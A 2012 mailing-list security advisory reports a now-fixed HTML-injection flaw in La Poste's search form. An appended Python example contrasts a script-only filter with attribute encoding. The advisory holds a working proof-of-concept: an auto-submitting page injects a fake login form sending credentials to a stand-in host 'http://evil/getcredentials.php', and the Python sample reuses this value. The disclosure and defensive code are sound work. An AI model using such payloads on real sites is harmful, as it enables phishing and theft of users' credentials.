Date: Wed, 5 Dec 2012 16:05:37 +0100
From: Emmanuel FARCY <manu.farcy@...il.com>
To: Bugtrack <bugtraq@...urityfocus.com>, Full Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: XSS vulnerability on laposte.fr

Website: laposte.fr
Version: -
Enterprise website: http://www.laposte.fr
Status: fixed
Level: Low

=========
Description
=========
La Poste is the main French mail services firm.

=========
Details
=========
The search form in the international posting section is vulnerable to XSS:
http://www.laposte.fr/courrierinternational/index.php?id=416

Due to improper sanitization, the search field can be used for an XSS attack. JavaScript is correctly filtered, but HTML tags are not.

=========
Example
=========
A forged email can be sent like this:

<html>
<form name="hahaha" method="post" action="http://www.laposte.fr/courrierinternational/index.php?id=416">
<input name="tx_indexedsearch[sword]" id="rechercheAv" value='"></form><br><br><form method="post" action="http://evil/getcredentials.php"><div class="formLog"><fieldset class="fieldsetForm"><legend>Veuillez Vous identifier</legend><label for="login" class="navCachee">Identifiant</label><input type="text" name="user" id="login" value="Email" class="inputSmall"/><br /><label for="password" class="navCachee">Mot de passe</label><input value="mot de passe" type="password"/><br /><input type="submit" id="ok" name="submit" value="Se connecter" class="buttonSmall" /></form><!--' class="input" type="hidden" />
</form>
<script>
document.hahaha.submit();
</script>
</html>

Timeline
=========
09/10/2012: bug report with POC
02/11/2012: Vulnerability fixed after several emails, because they didn't understand the risk (This is a POST parameter, how can I be vulnerable, evil must be behind the victim!)
05/12/2012: Advisory published

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
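
The following is an added example, not part of the original advisory and not the site's code. It contrasts a filter that removes JavaScript but keeps HTML tags, as the advisory describes, with output encoding of the search term for an attribute context, and parses both rendered pages to count the forms a browser would see. The template, the /search action, the sample input and all function names are assumptions constructed for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical search-box template; the site's real markup is not on the page.
TEMPLATE = ('<form method="post" action="/search">'
            '<input name="tx_indexedsearch[sword]" value="{v}" class="input"/></form>')

# Constructed input shaped like the advisory's value: it closes the attribute
# and the form, then opens a second form that posts to another host.
SAMPLE = ('"></form><form method="post" action="http://evil/getcredentials.php">'
          '<input name="user"/></form><!--')

def strip_script_only(value):
    """The kind of filter the advisory describes: JavaScript removed, tags kept."""
    value = re.sub(r"(?is)<script.*?>.*?</script\s*>", "", value)
    value = re.sub(r"(?i)javascript:", "", value)
    return re.sub(r"(?i)\son\w+\s*=", " ", value)

def encode_for_attribute(value):
    """Output encoding for an HTML attribute: &, <, > and both quotes become entities."""
    return escape(value, quote=True)

class PageAudit(HTMLParser):
    """Collects every form action and the search field value the parser sees."""
    def __init__(self):
        super().__init__()
        self.actions, self.search_values = [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action"))
        elif tag == "input" and attrs.get("name") == "tx_indexedsearch[sword]":
            self.search_values.append(attrs.get("value"))

def audit(value, sanitizer):
    """Render the template with the sanitized value and parse the result."""
    parser = PageAudit()
    parser.feed(TEMPLATE.format(v=sanitizer(value)))
    parser.close()
    return parser.actions, parser.search_values

if __name__ == "__main__":
    print("filter only :", audit(SAMPLE, strip_script_only))
    print("encoded     :", audit(SAMPLE, encode_for_attribute))
```

With the script-only filter the rendered page contains a second form with a foreign action; with attribute encoding there is a single form and the search term round-trips unchanged as the field's value.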